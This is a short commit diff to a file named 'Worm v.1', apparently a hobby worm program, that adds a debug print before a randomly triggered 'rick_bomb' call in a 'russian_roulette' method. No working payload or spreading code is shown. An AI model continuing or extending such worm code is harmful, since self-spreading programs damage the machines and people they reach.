added print statement debug

--- a/Worm v.1
+++ b/Worm v.1
@@ -197,6 +197,7 @@ class Worm:
     def russian_roulette(self):
         num = random.randint(0, 5)
         if ROULETTE == num:
+            print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!HIT NUMBER!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
             self.rick_bomb()
         
     def start_worm_actions(self):
